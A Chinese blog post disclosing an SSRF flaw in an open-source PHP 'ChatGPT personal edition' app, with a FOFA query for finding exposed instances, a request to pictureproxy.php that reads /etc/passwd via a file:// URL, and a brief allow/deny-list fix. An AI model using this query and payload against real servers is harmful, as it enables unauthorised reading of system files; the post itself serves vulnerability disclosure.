chatgpt个人版ssrf漏洞

扣脚大汉在网络2024-09-17 18:32

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码 
title="ChatGPT个人专用版"

漏洞描述

该系统是一个开源的chatgpt系统,是PHP版调用OpenAI的API接口进行问答的模型,在prictureproxy.php文件处存在ssrf漏洞

漏洞复现

payload

yaml 复制代码 
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: x.x.x.x

修复建议

修改源代码,进行黑白名单

相关推荐
奔跑吧邓邓子2 天前
【C++实战(75)】筑牢安全防线,攻克漏洞难题
c++·安全·实战·漏洞
黑客思维者6 天前
Notepad++中高危DLL劫持漏洞深度剖析
notepad++·漏洞·dll劫持
李白你好1 个月前
CVE-2025-2502 / CNVD-2025-16450 联想电脑管家权限提升漏洞
漏洞
网络研究院1 个月前
Citrix 零日漏洞自五月起遭积极利用
网络·安全·漏洞·威胁
网络研究院2 个月前
新的 SHAMOS MacOS 窃取程序利用单行终端命令攻击用户
macos·攻击·漏洞·用户
IT 青年2 个月前
CVE-2014-6271(bash破壳漏洞 )
漏洞
网络研究院2 个月前
新的“MadeYouReset”方法利用 HTTP/2 进行隐秘的 DoS 攻击
网络·网络协议·安全·http·攻击·漏洞
IT 青年2 个月前
CVE-2020-24557
漏洞
第十六年盛夏.2 个月前
【网络安全】不安全的反序列化漏洞
网络安全·漏洞
IT 青年2 个月前
CVE-2021-21148
漏洞
热门推荐
01GitHub 镜像站点02KGG转MP3工具|非KGM文件|解密音频03两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答04UV安装并设置国内源05PHP htmlspecialchars()函数详解06Linux下V2Ray安装配置指南07BongoCat - 跨平台键盘猫动画工具08jdk21下载、安装(Windows、Linux、macOS)0946个Nano-banana 精选提示词,持续更新中10Claude Code & 智谱GLM-4.5 环境配置指南 (Windows/macOS/Ubuntu)